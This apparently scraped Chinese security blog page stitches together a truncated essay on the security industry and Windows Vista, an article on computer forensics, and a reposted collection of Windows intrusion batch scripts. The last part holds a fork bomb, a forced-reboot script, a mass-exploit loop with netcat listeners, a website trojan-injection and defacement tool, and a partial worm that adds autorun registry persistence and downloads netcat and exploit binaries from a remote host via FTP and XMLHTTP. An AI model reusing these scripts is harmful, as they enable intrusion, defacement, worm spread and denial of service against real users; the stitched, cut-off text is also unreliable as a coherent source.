电影《笑傲江湖》中任我行说:“有人就有江湖 ”。从有马帮的那一天起,就有马贼;从有海船的那一天起,就有海盗。有盗贼怎么办?理论上靠官府,实际上靠自己。自己搞不定怎么办?花钱找镖局。几千年 来,什么时候这个格局改变过?过去镖局保的是金银,今天我们保的,归根结底也还是金银。从这个意义上讲,我们这个行业其实是镖局发展进入信息时代后,出现 前面说的“技术方向上的变化”,而化生出来的。
所以,只要人类社会还存在信息交换行为,只要这些信息交换涉及到利益,就会有人试图改变这些利益的分配规则,就会有对信息安全的需求。百川归大海,这是一个根本法则,不管中间怎么九曲十八弯,最终,这个根本法则是不会有什么变化的。
大家感觉信息安全形势比前两年要好,可能一个主要原因就是看到软硬件厂商对安全越来越重视,安全措施越来越多。而看起来,比较严重的安全漏洞似乎有减少的 趋势。互联网上几乎每台机器都有防火墙保护。新的Fedora Core默认开启了Linux的很多安全特性,而且看起来以后会一直这样下去。微软将要发布的Vista也似乎是一个强健无比的系统。这一切仿佛都在暗示 信息安全会成为一个历史阶段性的事物,随着安全形势的进一步好转,这个行业也会逐渐淡去。
下面我们具体来谈谈这些问题。
Vista是个纸老虎
很多搞Windows安全的人最近都着实被微软的Vista给吓着了,觉得以后Windows就安全了,没什么可搞了。微软号称这个系统比前代大大增强了 安全性。不过大家别忘了,微软推出Windows 2000的时候是这么宣传的,推出Windows XP的时候是这么宣传的,推出Windows 2003的时候也是这么宣传的。
当然,实事求是地说,从我们最近一段时间对Vista Beta版的研究来看,这个新系统的确采取了很多新的安全特性,大大增加了传统漏洞的利用难度;新的开发过程和开发工具也的确降低了漏洞发生的几率,比起之前的产品在安全上可以说有一个大飞跃。
但关键问题是:人们真的会接受这样一个用大量确认窗口和限制措施来虐待用户的操作系统么?更别提可怕的资源占用和乌龟般的速度了。至少我是绝对不会用这个 东西的。估计在Vista正式上市后,各种Windows优化软件肯定会立即提供关闭这些安全特性的功能。
信息安全,信息为肉,安全为骨。肉无骨则不立,骨无肉则不活。蚯蚓之类,只有肉没有骨,尚可以慢慢蠕动,可以不太精彩地活下去;但是没有肉,光剩骨头,什 么动物也活不了。安全措施对用户的扰动越小,就越容易被接受。时刻发挥作用,却几乎感觉不到它的存在,这就是安全工作的至善境界,也是最难达到的目标。要 不然为什么杜雷斯的超薄型卖得贵还那么受欢迎。
现在看来,Vista就是个至少一厘米厚的杜雷斯。
任何企业的目标都是挣钱,只有当维护用户安全和挣钱这个目标恰好吻合时,它就会设法增强用户安全,如果维护用户安全影响了挣钱这个目标,它一定会考虑重新调整两边的砝码。
今天我在这里关起门来做个大胆的预言:Vista终将成为一个类似Windows ME那样没什么人愿意用的失败产品。微软甚至可能会在Vista后续的Service Pack或者下

论网络犯罪取证技巧

十二月 12, 2008 by · Leave a Comment
Filed under: 网络安全 

随着网络信息技术的发展,计算机网络逐渐成为人们生活和工作中不可或缺的组成部分,它改变了人们传统的工作习惯和生活节奏。在人们越来越依赖网络的今天,伴随着计算机网络的日新月异,计算机网络犯罪也逐渐走进了我们的视线。黑客攻击、网络钓鱼,僵尸网络,这些以谋取非法利益为目的的新兴犯罪手段,使人们诚惶诚恐。不仅仅是因为担心数据丢失给企业和个人造成经济损失,更重要的原因是当企业或个人发现了被黑客攻击,被病毒侵害而造成损失后,往往不知道该怎么办,举报到相关部门,又缺乏足够的证据,毕竟这是虚拟的世界,找证据非常的难。这也是本文要和大家探讨的问题:计算机取证。

计算机证据是指在计算机系统运行过程中,产生用以证明案件事实的内容的一种电磁记录物。针对网络攻击事件,可以作为证据有:系统日志、应用日志、服务器日志、网络日志、防火墙日志、入侵检测、磁盘驱动器、文件备份等等,其中入侵检测、服务器日志是主要的证据来源。从企业信息网络安全建设来看,计算机取证已经成为一个重要的领域。通过检查计算机的访问日志信息,可以了解犯罪嫌疑人在该计算机上做了哪些事情,找到可疑文件;通过黑客工具反向判定,可以追踪黑客动向以及了解黑客活动。

但是从目前的情况来看,网络取证还是非常困难的,因为到目前为止,国家还没有一个成文的相关法规出台。而且现在的犯罪分子也十分狡猾,网络犯罪手段也非常隐蔽多样,以色情犯罪为例,在罪犯建设的站点上,开辟隐藏的色情版块,只给那些老成员访问,有着长期的信任关系才能访问嫌疑人到隐藏版块,其他会员则不可见。有些甚至只有通过2层、3层网络代理才可以访问,还有人使用vpn做加密通道,在肉鸡上放置色情资源,嫌疑人为了证明自己的清白,经常在主页上植入木马程序,自己不光卖流量,还卖信封(51CTO编者注:信封是指个人信息,visa,信用卡等访问会员信息),当你抓捕他的时候,他能诡辩的声称这个服务器空间是被别人给利用了,自己也是受害者。这些手段和行为在司法机关立案和定罪时,确实很难成为呈堂证供。计算机取证这条道路是漫长而深远的,有时抓获嫌疑人,却因为证据不足而不能定罪,留下的是更多的无奈。

用事实说话

2006年6月,我所在城市的刑侦大队,来找我帮忙做一次计算机技术分析和取证。起因是当地的一个犯罪分子在劫车杀人后,曾经来过当地的汽车配件市场中的一个商店,买过一个零件,而当时卖配件的售货人员在他们使用的电脑上留有一些销售记录。我首先查看了机器上装的销售软件,该销售软件是广东开发的,操作平台是基于DOS开发的,很BT(51CTO编者注:BT在这里可以理解成“变态”),竟然还调用了ucdos。经过一些行为分析和操作检查后,发现里面有很多记录,但是很多从登记的人员信息来看都是虚假的,更奇怪的是只有近几天的销售记录,而没有以前的。就打电话给商店老板,老板说这个电脑平时都是用来做销售记录,偶尔听听音乐的,没有人懂电脑的,经过再三的确认,或许有人误操作吧。不过这也难不倒我们,用EasyRacover(51CTO编者注:EasyRacover是一种数据恢复软件)经过近3个小时的恢复,发现了不少东西。遗憾的是还没发现有价值的信息,在一些数据库文件中发现的销售日期是近来几天的。哎,看下表都已经夜里2点了,抽颗烟,继续分析,期间用了很多工具,还是一无所获。第2天早上,朋友买来早点,等着听我的好消息,我只能两手一摆,没有结果。但是我不死心,因为从我个人研究的角度考虑,肯定还是有内在原因的,商店那边肯定还是有问题。经过再三的询问,终于才知道里面有一个销售人员懂点基本的操作,晚上趁老板不在的时候,看一些自己买的色情影碟,后来机器中了病毒,他怕老板知道,就用了那种ghost版本的winxp安装盗版光盘,哎,就是这个可怕的ghost,造成了永久不能复原,让我们在第一时间损失了获得嫌疑人第一手的信息,经过后来和一些数据恢复专家的探讨,他们说这就相当于一次物理写入,在数据恢复研究领域,物理擦写是无法在还原记录的,就是目前美国也无法完成物理擦写后的数据恢复。

这是我当是第一次做取证方面的事情,虽然是失败了,但是却激发了我很浓厚的兴趣,现在一直也在这个方面做一些研究,有时也和警察朋友一起做些配合。

那么黑客是怎么去消除证据的?

是不是真的象一些黑客电影里面演的那样,把使用的数据光盘放入微波炉里面摧毁,把硬盘锁定,敲任意键都进入数据倒计时自我毁灭状态。说老实话,把光盘放入微波炉里面,消除证据我还没有做过,不过以前和朋友到是真写过一个毁坏硬盘的程序,程序运行的时候要对磁头进行读写,硬盘盘片高速旋转,cpu做大量计算的时候,突然之间停止,杀死他的马达。主要思路是来自对软驱的读写控制,因kill motor 这个命令而想到的,为此也报废了一个硬盘。所以键入任意键,进入硬盘自毁程序,我是认可的。而放入微波炉的那个,想想太危险,就没有做个这样的测试。其实大多数黑客都不是只有一个硬盘的,一般情况下都是有2-3块移动硬盘,把一些珍贵数据放在里面。在他们跑路的时候,用塑料带罩着。放在隐藏的角落,具体什么位置,大家自己去想吧。每个人的思路不一样,我这里不好多做解释。现在还有的一些黑客把资料放在自己的pda手机里面,手机都是二手的,然后在把SIM卡进行擦写,即使我们做了发射基站定位,也还是找不到他们真正的藏匿之所。黑客还喜欢把经过跳转的路由节点都一个个的干掉,把犯罪信息抹除的干干净净。

如何查找证据呢?

一般黑客的常用做法就是以假乱真,通过注册表来克隆帐户,用克隆帐户访问一些核心信息,通过DOS修改文件时间等手段,造成一种迷惑的假象。很多木马程序都是放在system32里面。很少有用户留意这个目录。黑客也会在肉鸡上开vpn服务,不过通常访问的时候都是过三层代理访问肉鸡,即使被发现和跟踪也只能访问到代理主机,同样它也是一台肉鸡,而且多数都不是在国内。这给取证方面增加了很大难度。

黑客通常在访问完肉鸡(傀儡机)后,首先要做的工作,是清除系统访问日志,国内的都喜欢用小榕的那个工具清除系统日志,一般我们浏览一些信息的时候,从“开始”菜单的“文档”菜单可查看到Windows 系统自动记录的最后使用的十五个文档,实际上,这个信息存放在C:\Documents and Settings\Default User\Recent中(51CTO编者注:Default User是Windows操作系统登陆的用户帐号,下同),它还包括有文件链接和访问时间,检查此文件夹,可以了解最近计算机的使用情况。

不仅如此,从开始菜单,运行regedit ,从注册表中搜索recent ,将得到许多recent 记录。例如:

在HKCU\ Software\ Microsof t \ DevStdio \ 6. 0\ Recent File List 有开发工具Visual Studio 的最近使用的程序文件和工程文件;

在HKCU\ Software\ Adobe\ Acrobat Reader\ 8. 0\ AdobeViewer 有该软件最近阅读过的文件;

在HKCU\ Sof tware \ Microsof t \ Office\ 9. 0\ Excel\ Recent Fil
es 有Excel 最近打开的文档;

前述开始菜单的十五个文档也存放在HKCU\ Sof tware\ Microf t \Windows \ CurrentVersion \ Explorer \ RecentDocs ,只不过文件名使用的是Unicode 编码;

在C:\Documents and Settings\Default User\ Local Settings \History 中存有最近访问所留下的所有文件;

IE 访问历史在C:\Documents and Settings\Default User\ LocalSettings\ Temporary Internet Files ,记录了Internet 地址、标题和上次访问时间等;

在HKCU\ sof tware\ Microsof t \ Internet Explorer Type2dURLS 路径下可以看到上网的网址。

C:\Documents and Settings\Default User\ Favorites 是收藏夹,在作系统信息检查时,应当在资源管理器中设置“显示所有文件”,因为在默认情况下,系统文件夹设置成“隐藏”属性。通过这些操作就可以看到我们访问过的一些痕迹。

国外的是怎么样做网络取证的?

随着美剧越狱的热播,大家都对那个充满着离奇色彩的电影而充满想象,但是处于职业习惯,我更看中的是那个FBI探员的犯罪猜想以及FBI做的数据还原。FBI就是通过硬盘的数据恢复从而知道了男主角的全盘计划。如果不想让人看到自己的一些记录,完全可以把硬盘进行分解,做物理性破坏。从近三年的计算机安全技术论坛(FIRST年会)看,计算机取证已经成为广为关注的问题。国际上在计算机取证方面已有比较深入的研究,并且有不少公司推出了相关的应用产品。美国五个已建成和计划建设中的计算机取证实验室,专门用于恐怖活动追踪和计算机犯罪调查。

一般国外惯用的取证手法还是通过专业工具,主要使用Encase和Ftk这两个工具软件,通过二进制数据还原技术来重现一些机器操作信息和软件安装数据信息等。在电子邮件取证方面是通过EmailTrackPro这个工具来做一些电子邮件定位,通过分析邮件来往信息头做出判定,同时这也是捕捉网络蠕虫病毒,跟踪源惯用的方法,还有通过Filemon等工具做一些信息比对,找出木马和黑客软件的容身之所,根据逆向分析来进行反跟踪,侦查黑客的所在地。从而通过诱捕、抓捕犯罪嫌疑人,当然更多的也是通过高额的赏金来做情报收集。圈里有一种传说:FBI可以对六次的重复擦写的磁盘做出数据还原。我也和国外的朋友探讨过,大家一致认为这绝对是不可能的,要不怎么说是传说呢?

应该怎么取证

为了确保证据的安全、可信,计算机证据国际组织( International organization on Computer Evidence ,IOCE) 对数字证据的采集、保存、检验和传送提出的特别要求:“必须使用有效的软硬件进行采集和检验;数字证据的采集、检验、传送全过程都必须有记录;任何有潜在可能对原始数字证据造成改变、破坏或毁坏的活动必须由有法律上承认的有资质的人进行。对现场计算机的一个处理原则是,已经开着的计算机不要关掉,关着的计算机不要打开。如果现场计算机是开着的,应避免使屏幕保护程序激活。检查屏幕上的活动。如果发现系统正在删除文件、格式化、上传文件、系统自毁或进行其他危险活动,立即切断电源。

现场取证时,应当记录系统日期和时间、主存内容、当前执行的进程列表、在端口提供服务的程序列表、当前系统内用户列表,如果是联网系统,还应收集当前连入系统的用户名和远程系统名。还应当尽可能记录使用者的个人情况、用户名、口令、密码等。

对于计算机硬盘数据,使用专用的取证工具进行硬盘复制,在实验室对备份的硬盘进行检验,采集证据。原始硬盘封存保管。对于取证用的计算机,要进行病毒检测,防止病毒传染到被检测的计算机。

计算机取证方面存在的问题总结:

计算机取证技术是相关法律法规赖以实施的基础,是我国全面实现信息化的重要技术之一,但现在还存在以下问题:

(1)计算机取证涉及到磁盘分析、加密、数据隐藏、日志信息发掘、数据库技术、介质的物理性质等多方面的知识,取证人员除了会使用取证工具外,还应具备综合运用多方面知识的能力。

(2)在取证方案的选择上应结合实时取证和事后取证两种方案,以保证取证的效果,因此可以将计算机取证融合到入侵检测等网络安全工具中,进行动态取证。这样,整个取证过程将更加系统并具有智能性。

(3)计算机取证只是一种取证手段,并不是万能的,因此应与常规案件的取证手段相结合,比如询问当事人、保护现场等,从而有效打击计算机犯罪。

(4)到目前为止,尽管相关部门早已进行了计算机安全培训,但还没有一套成形的操作规范,使得取证结果的可信性受到质疑。为了能让计算机取证工作向着更好的方向发展,制定取证工具的评价标准和取证工作的操作规范是非常必要的。

http://www.jiasijun.com  贾思军网络营销顾问

E-Mail/MSN: china.03@163.com   QQ:1132233935

各种入侵批处理汇总

九月 5, 2008 by · Leave a Comment
Filed under: 网络安全 

第一个:让别人内存OVER(逼他重启)

@echo off

start cmd

%0

就这3行了

第二个:让对方重启指定次数(害人专用)

@echo off

if not exist c:\\1.txt echo. >c:\\1.txt & goto err1

if not exist c:\\2.txt echo. >c:\\2.txt & goto err1

if not exist c:\\3.txt echo. >c:\\3.txt & goto err1

if not exist c:\\4.txt echo. >c:\\4.txt & goto err1

if not exist c:\\5.txt echo. >c:\\5.txt & goto err1

goto err2

:err1

shutdown -s -t 0

:err2

上面可以让对方电脑重启5次后不在重启

第三个:自动踢人(3389肉机保护自己专用)

@echo off

logoff 1

del log.bat

logoff后面的1改成自己登陆的ID号,用query user查看

第四个: 批量自动溢出

@for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521

先自己用NC监听端口,多开几个,然后指行,就自动溢出了

第五个:自动挂马改主页

@echo off

cls

rem 直接打批处理名字就有帮助

title 批量挂马,改首页(伤脑筋 QQ:447228437).

color A

set pan=%1

set ye=%2

set dai=%3

if \"%pan%\"==\"\" goto e1

if \"%ye%\"==\"\" goto e1

if \"%dai%\"==\"\" goto e1

if \"%dai%\"==\"htm.txt\" goto u1

forfiles /p %pan% /m %ye% /s /c \"cmd /c if @isdir==FALSE echo ^ >>@path\"

echo.

echo 代码全部插入完毕!!!!

echo.

pause

goto e1

:u1

echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容.

echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作.

pause

forfiles /p %pan% /m %ye% /s /c \"cmd /c if @isdir==FALSE copy %1\\htm.txt @path /y\"

echo.

echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉.

echo.

pause

:e1

echo.

echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下

echo 用法:snj ^ ^ ^

echo 例子:snj d:\\ index.asp www.muma.com/mm.htm

echo 批处理将自动添加^标记

echo.

echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件.

echo 然后将要更改的代码加COPY到里面保存.然后将命令的^项输入为htm.txt即可.

echo 例子:snj d:\\ index.asp htm.txt

echo.

echo 为了能准确无误执行批处理请最好先把记事本的\"自动换行功能去掉\",让命令保持在一行才能正确执行.

echo.

echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用!

echo.

第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒

本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里.

这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完

del c:\\42.exe

del c:\\nc.exe

del c:\\ip.exe

echo dim wsh > %systemroot%\\help\\test.vbs

echo set wsh=CreateObject(\"WScript.Shell\") >> %systemroot%\\help\\test.vbs

echo wsh.run \"cmd /c %systemroot%\\help\\nc -v -l -p 810 > %systemroot%\\help\\test.vbs

echo dim wsh > %systemroot%\\help\\test2.vbs

echo set wsh=CreateObject(\"WScript.Shell\") >> %systemroot%\\help\\test2.vbs

echo wsh.run \"cmd /c start %systemroot%\\help\\good.bat\",0 >> %systemroot%\\help\\test2.vbs

echo open 10.0.0.5 > %systemroot%\\help\\ftp.txt

echo open myyes >> %systemroot%\\help\\ftp.txt

echo 1 >> %systemroot%\\help\\ftp.txt

echo binary >> %systemroot%\\help\\ftp.txt

echo get 42.exe c:\\42.exe >> %systemroot%\\help\\ftp.txt

echo get nc.exe c:\\nc.exe >> %systemroot%\\help\\ftp.txt

echo get ip.exe c:\\ip.exe >> %systemroot%\\help\\ftp.txt

echo bye >> %systemroot%\\help\\ftp.txt

echo echo Set xPost = CreateObject(\"Microsoft.XMLHTTP\") ^>1.vbs > %systemroot%\\help\\or.txt

echo echo xPost.Open \"GET\",\"http://10.0.0.5/my.exe&quo…,0 ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo Set sGet = CreateObject(\"ADODB.Stream\") ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo sGet.SaveToFile \"d:\\my.exe\",2 ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo 1.vbs ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo echo my.exe ^>^>1.vbs >> %systemroot%\\help\\or.txt

echo Windows Registry Editor Version 5.00 > %systemroot%\\help\\1.reg

echo [HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run] >> %systemroot%\\help\\1.reg

echo \"SKYNET Personal FireWall\"=\"F:\\\\系统安全工具\\\\FireWall\\\\PFW.exe\" >> %systemroot%\\help\\1.reg

echo \"1\"=\"%systemroot%\\\\help\\\\test2.vbs\" >> %systemroot%\\help\\1.reg

if not exist %systemroot%\\help\\good.bat copy good.bat %systemroot%\\help\\good.bat & %systemroot%\\help\\test2.vbs & del good.bat

regedit -s %systemroot%\\help\\1.reg

ftp -s:%systemroot%\\help\\ftp.txt

move c:\\nc.exe %systemroot%\\help\\ /y

move c:\\42.exe %systemroot%\\help\\ /y

move c:\\ip.exe %systemroot%\\help\\ /y

%systemroot%\\help\\test.vbs

rem for /f %%i in (result1.txt) do set a=%%i

rem for /f %%j in (result.txt) do 42 %a% %%j 810

准备:

1:找一个反向连接的溢出攻击程序,如ms06040漏洞

2:找呀一个免费FTP空间,最好是送域名的

3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具.

思路:

用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 %systemroot%\\help\\test.vbs

echo set wsh=CreateObject(\"WScript.Shell\") >> %systemroot%\\help\\test.vbs

echo wsh.run \"cmd /c %systemroot%\\help\\nc -v -l -p 810 > %systemroot%\\help\\test.vbs

生成随机IP工具的VB代码

Private Sub Form_Load()

Dim fso As New FileSystemObject

Dim a, b, c, d As Integer

Dim ph, e As String

ph = App.Path & \"\\\"
& \"ip.txt\"

Randomize

a = Int(253 * Rnd + 1)

b = Int(253 * Rnd + 1)

c = Int(240 * Rnd + 1)

Open ph For Output As #1

For i = c To c + 7

For j = 1 To 254

e = a & \".\" & b & \".\" & i & \".\" & j

Print #1, e

DoEvents

Next j

Next i

Close #1

Unload Me

End Sub

(在此谢谢原创者!)   

本文网络上也传有很多,这是转来学习深化用的,对初学热心网络安全的同学讲一句:以上codes记住不是在你的电脑上用就可以了(除非你想实验,当然实验用虚拟机很方便了). 别学之前我告诉一哥们,他拿去用第一个批处理,结果强行重启还来问我是怎么了.